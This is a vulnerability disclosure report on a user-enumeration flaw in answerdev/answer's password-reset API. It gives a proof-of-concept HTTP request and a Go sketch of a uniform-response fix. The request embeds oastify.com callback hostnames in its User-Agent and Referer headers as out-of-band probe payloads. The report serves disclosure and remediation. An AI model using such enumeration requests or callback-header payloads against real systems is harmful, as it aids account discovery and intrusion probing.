Observable Response Discrepancy in Password Reset Functionality in answerdev/answer
Valid
Reported on
Feb 21st 2023
Description
The password reset functionality leaks information about user accounts. Where an invalid account is supplied, the application responds that the account could not be found. Where the account is valid, the application responds with the reason "base.success" (when intercepted), or, in the browser, with a message that an email will be sent if an account with that name is identified.
Proof of Concept
POST /answer/api/v1/user/password/reset HTTP/1.1
Host: 192.168.1.66:9080
Content-Length: 90
Accept-Language: en_US
Authorization:
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36 root@qmg10q7skchmypqtyu1x6l92styvxslh.oastify.com
Content-Type: application/json
Accept: */*
Origin: http://192.168.1.66:9080
Referer: http://egypue1ge0basdkhsivl093qmhsjref3.oastify.com/ref
Accept-Encoding: gzip, deflate
Connection: close
Cache-Control: no-transform
{"e_mail":"testemail@email.com","captcha_code":"4a2u","captcha_id":"EmC1gF0NkgvUvCdHAu7z"}
Impact
An attacker can enumerate valid user email accounts, which increases the application's attack surface.
Occurrences
user_service.go L158
Where an invalid username is provided, the response gives UserNotFound as the reason.
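To make the discrepancy concrete, the following Go snippet (an added example, not answerdev/answer's own code) contrasts the leaky pattern from the description, where the repository's UserNotFound error is returned as the response reason, with a uniform variant that answers identically for known and unknown accounts. The account store, mailer stub and attempt log are constructed stand-ins for the real service.

```go
package main

import "errors"

// Constructed in-memory account store standing in for the real user
// repository (hypothetical; not answerdev/answer's code).
var knownEmails = map[string]bool{"alice@example.com": true}
var errUserNotFound = errors.New("UserNotFound")
// Side effects kept observable for the caller: mails only go to real
// accounts, and unknown-account attempts are recorded for detection.
var mailsSent int
var unknownAttempts []string

// ResetResponse is what the reset endpoint hands back to the client.
type ResetResponse struct {
	Status int
	Reason string
}

func lookupUser(email string) error {
	if !knownEmails[email] {
		return errUserNotFound
	}
	return nil
}

func sendResetMail(email string) { mailsSent++ } // stub for the mailer

// resetLeaky mirrors the pattern the report describes: the repository
// error becomes the response reason, so the client learns whether the
// account exists.
func resetLeaky(email string) ResetResponse {
	if err := lookupUser(email); err != nil {
		return ResetResponse{Status: 400, Reason: err.Error()}
	}
	sendResetMail(email)
	return ResetResponse{Status: 200, Reason: "base.success"}
}

// resetUniform answers identically for known and unknown accounts; the
// lookup result only decides whether a mail goes out, and the unknown
// case is logged server-side so enumeration attempts stay detectable.
func resetUniform(email string) ResetResponse {
	if err := lookupUser(email); err != nil {
		unknownAttempts = append(unknownAttempts, email)
	} else {
		sendResetMail(email)
	}
	return ResetResponse{Status: 200, Reason: "base.success"}
}
```

A uniform body and status is only half the fix: if the mail is sent synchronously, response timing can still differ between the two branches, so the mail should be queued rather than sent inline.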
References
We are processing your report and will contact the answerdev/answer team within 24 hours. (3 months ago)
We have contacted a member of the answerdev/answer team and are waiting to hear back. (3 months ago)
Joe Helle modified the report. (3 months ago)
The researcher's credibility has increased: +7
user_service.go#L158 has been validated